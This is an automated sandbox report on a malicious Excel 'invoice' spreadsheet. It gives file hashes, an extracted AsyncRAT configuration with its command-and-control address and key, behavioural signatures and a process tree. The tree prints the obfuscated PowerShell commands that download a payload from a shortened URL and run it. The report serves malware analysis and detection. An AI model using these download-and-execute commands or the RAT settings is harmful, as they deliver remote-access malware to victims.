Analysis
- max time kernel: 144s
- max time network: 145s
- platform: windows10_x64
- resource: win10
- submitted: 26-10-2020 09:06
Static task: static1
Behavioral task: behavioral1
Sample: Invoice 098734543 3.xls
Resource: win7
General
- Target: Invoice 098734543 3.xls
- Size: 66KB
- MD5: a86efdb09b8ec5a298f512459ff8d64d
- SHA1: 17a9506e70c78f7de865af5be040384997bba4cb
- SHA256: 71444376cd428f1934e94d2933197c4f0bfe03019b845a81fdeb922bcae95d7a
- SHA512: b984f9b55e46861b6233b13e1e88200db7bd43c6c09d95ccd6bda6a189c6cd00b6a30dc94b574d9db0a2cb139ef2f5284ac7a84a580072575341187f225851f0
Malware Config
Extracted
- https://tinyurl.com/y6ak9qcl
Extracted
- asyncrat 0.5.7B
- 185.165.153.249:4371
- AsyncMutex_6SI8OkPnk
- aes_key: 4lpLfCzV6wCkayaT0MjD3qp2ZVBd759O
- anti_detection: false
- autorun: false
- bdos: false
- delay: Default
- host: 185.165.153.249
- hwid: 3
- install_file: (empty)
- install_folder: %AppData%
- mutex: AsyncMutex_6SI8OkPnk
- pastebin_config: null
- port: 4371
- version: 0.5.7B
Signatures
- Process spawned unexpected child process (3 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: cmd.exe, cmd.exe, cmd.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3628 | 4660 | cmd.exe | EXCEL.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3776 | 4660 | cmd.exe | EXCEL.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4240 | 4660 | cmd.exe | EXCEL.EXE
- ServiceHost packer (12 IoCs)
  Detects ServiceHost packer used for .NET malware
  Processes:
  resource | yara_rule
  behavioral2/memory/1136-36-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/1136-35-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/1136-37-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/1136-38-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/1136-39-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/1136-40-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/1136-41-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/1136-42-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/1136-43-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/1136-44-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/1136-46-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/1136-45-0x0000000000000000-mapping.dmp | servicehost
- Blacklisted process makes network request (2 IoCs)
  Processes: powershell.exe
  flow | pid | process
  16 | 4124 | powershell.exe
  20 | 4124 | powershell.exe
- Executes dropped EXE (2 IoCs)
  Processes: ye.exe, ye.exe
  pid | process
  1136 | ye.exe
  4568 | ye.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (12 IoCs)
  Processes: ye.exe
  pid | process
  1136 | ye.exe (12 entries)
- Suspicious use of SetThreadContext (1 IoC)
  Processes: ye.exe
  description | pid | process | target process
  PID 1136 set thread context of 4568 | 1136 | ye.exe | ye.exe
- Program crash (1 IoC)
  Processes: WerFault.exe
  pid | pid_target | process | target process
  2572 | 1136 | WerFault.exe | ye.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
- Delays execution with timeout.exe (1 IoC)
  Processes: timeout.exe
  pid | process
  1492 | timeout.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: EXCEL.EXE
  pid | process
  4660 | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (27 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe, ye.exe, WerFault.exe
  pid | process
  4124 | powershell.exe (3 entries)
  4112 | powershell.exe (3 entries)
  3172 | powershell.exe (3 entries)
  1136 | ye.exe (3 entries)
  2572 | WerFault.exe (15 entries)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe, ye.exe, WerFault.exe
  description | pid | process
  Token: SeDebugPrivilege | 4124 | powershell.exe
  Token: SeDebugPrivilege | 4112 | powershell.exe
  Token: SeDebugPrivilege | 3172 | powershell.exe
  Token: SeDebugPrivilege | 1136 | ye.exe
  Token: SeRestorePrivilege | 2572 | WerFault.exe
  Token: SeBackupPrivilege | 2572 | WerFault.exe
  Token: SeDebugPrivilege | 2572 | WerFault.exe
- Suspicious use of SetWindowsHookEx (12 IoCs)
  Processes: EXCEL.EXE
  pid | process
  4660 | EXCEL.EXE (12 entries)
- Suspicious use of WriteProcessMemory (26 IoCs)
  Processes: EXCEL.EXE, cmd.exe, cmd.exe, cmd.exe, powershell.exe, ye.exe
  description | pid | process | target process
  PID 4660 wrote to memory of 3628 | 4660 | EXCEL.EXE | cmd.exe (2 entries)
  PID 4660 wrote to memory of 3776 | 4660 | EXCEL.EXE | cmd.exe (2 entries)
  PID 4660 wrote to memory of 4240 | 4660 | EXCEL.EXE | cmd.exe (2 entries)
  PID 3628 wrote to memory of 4124 | 3628 | cmd.exe | powershell.exe (2 entries)
  PID 4240 wrote to memory of 4112 | 4240 | cmd.exe | powershell.exe (2 entries)
  PID 3776 wrote to memory of 3172 | 3776 | cmd.exe | powershell.exe (2 entries)
  PID 4112 wrote to memory of 1136 | 4112 | powershell.exe | ye.exe (3 entries)
  PID 1136 wrote to memory of 1492 | 1136 | ye.exe | timeout.exe (3 entries)
  PID 1136 wrote to memory of 4568 | 1136 | ye.exe | ye.exe (8 entries)
Processes
- (depth 1) C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Invoice 098734543 3.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
- (depth 2) C:\Windows\SYSTEM32\cmd.exe
  Command line: cmd /k p^ower^shell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/y6ak9qcl'),'ye.exe')
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
- (depth 3) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/y6ak9qcl'),'ye.exe')
  - Blacklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- (depth 2) C:\Windows\SYSTEM32\cmd.exe
  Command line: cmd /k p^ower^shell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
- (depth 3) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- (depth 2) C:\Windows\SYSTEM32\cmd.exe
  Command line: cmd /k po^wer^shell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
- (depth 3) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- (depth 4) C:\Users\Admin\AppData\Roaming\ye.exe
  Command line: "C:\Users\Admin\AppData\Roaming\ye.exe"
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- (depth 5) C:\Windows\SysWOW64\timeout.exe
  Command line: timeout
  - Delays execution with timeout.exe
- (depth 5) C:\Users\Admin\AppData\Roaming\ye.exe
  Command line: "C:\Users\Admin\AppData\Roaming\ye.exe"
  - Executes dropped EXE
- (depth 5) C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 1720
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: d737fc27bbf2f3bd19d1706af83dbe3f
  SHA1: 212d219394124968b50769c371121a577d973985
  SHA256: b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
  SHA512: 974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 488f69042a436bd6fb05af90e635a6b9
  SHA1: 0441e50fe8cad913f12a7b520da367f8014e17ff
  SHA256: f39ed7bbab3606c71c91058334a8f9f8b6884a67483e73a09e41d60a2ea98d80
  SHA512: f2379fcef57310282746d5f8590e01bab373d8c8b666d8222dad267d12e7a506035212a2437d88973f5b5e13606b2c80c749ba03becb6871f868c25280d883f6
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 0c1c62bfca7af8d857af7e6b147ede67
  SHA1: e126c9ecd0486e3073009fb9480e02b27b21e394
  SHA256: 975afd5a68dc63afb61006a0599d8e9e183e9439548749d3dd5645379c0d6106
  SHA512: 148365943b464770d555dcc48de009173d3ae0a8fe42c2d2f66fd20f3ebd172402d61979418279a463e8644e68f590620838f080f2d10c95ed479dcc30a99f8b
- C:\Users\Admin\AppData\Roaming\ye.exe
  MD5: ae77db4c78360750c5b01b15d8453913
  SHA1: e165beb3ad5d55ada5941d21a7d1d0b0472c27cd
  SHA256: 54747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e
  SHA512: 7911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73
- C:\Users\Admin\AppData\Roaming\ye.exe
  MD5: ae77db4c78360750c5b01b15d8453913
  SHA1: e165beb3ad5d55ada5941d21a7d1d0b0472c27cd
  SHA256: 54747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e
  SHA512: 7911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73
- C:\Users\Admin\Documents\ye.exe
  MD5: ae77db4c78360750c5b01b15d8453913
  SHA1: e165beb3ad5d55ada5941d21a7d1d0b0472c27cd
  SHA256: 54747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e
  SHA512: 7911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73
- memory/1136-35-0x0000000000000000-mapping.dmp
- memory/1136-37-0x0000000000000000-mapping.dmp
- memory/1136-45-0x0000000000000000-mapping.dmp
- memory/1136-46-0x0000000000000000-mapping.dmp
- memory/1136-44-0x0000000000000000-mapping.dmp
- memory/1136-43-0x0000000000000000-mapping.dmp
- memory/1136-42-0x0000000000000000-mapping.dmp
- memory/1136-41-0x0000000000000000-mapping.dmp
- memory/1136-40-0x0000000000000000-mapping.dmp
- memory/1136-39-0x0000000000000000-mapping.dmp
- memory/1136-19-0x0000000000000000-mapping.dmp
- memory/1136-38-0x0000000000000000-mapping.dmp
- memory/1136-22-0x0000000073CC0000-0x00000000743AE000-memory.dmp (Filesize: 6.9MB)
- memory/1136-23-0x0000000000900000-0x0000000000901000-memory.dmp (Filesize: 4KB)
- memory/1136-24-0x0000000005590000-0x0000000005591000-memory.dmp (Filesize: 4KB)
- memory/1136-25-0x0000000005170000-0x0000000005171000-memory.dmp (Filesize: 4KB)
- memory/1136-36-0x0000000000000000-mapping.dmp
- memory/1136-27-0x0000000006080000-0x000000000609A000-memory.dmp (Filesize: 104KB)
- memory/1492-26-0x0000000000000000-mapping.dmp
- memory/2572-47-0x0000000004D90000-0x0000000004D91000-memory.dmp (Filesize: 4KB)
- memory/2572-34-0x0000000004750000-0x0000000004751000-memory.dmp (Filesize: 4KB)
- memory/3172-8-0x0000000000000000-mapping.dmp
- memory/3172-10-0x00007FF877650000-0x00007FF87803C000-memory.dmp (Filesize: 9.9MB)
- memory/3628-1-0x0000000000000000-mapping.dmp
- memory/3776-2-0x0000000000000000-mapping.dmp
- memory/4112-6-0x0000000000000000-mapping.dmp
- memory/4112-7-0x00007FF877650000-0x00007FF87803C000-memory.dmp (Filesize: 9.9MB)
- memory/4112-13-0x000001C8D63F0000-0x000001C8D63F1000-memory.dmp (Filesize: 4KB)
- memory/4124-5-0x00007FF877650000-0x00007FF87803C000-memory.dmp (Filesize: 9.9MB)
- memory/4124-4-0x0000000000000000-mapping.dmp
- memory/4124-9-0x000002255B080000-0x000002255B081000-memory.dmp (Filesize: 4KB)
- memory/4240-3-0x0000000000000000-mapping.dmp
- memory/4568-28-0x0000000000400000-0x0000000000412000-memory.dmp (Filesize: 72KB)
- memory/4568-31-0x0000000073CC0000-0x00000000743AE000-memory.dmp (Filesize: 6.9MB)
- memory/4568-29-0x000000000040D06E-mapping.dmp
- memory/4660-0-0x00007FF87F650000-0x00007FF87FC87000-memory.dmp (Filesize: 6.2MB)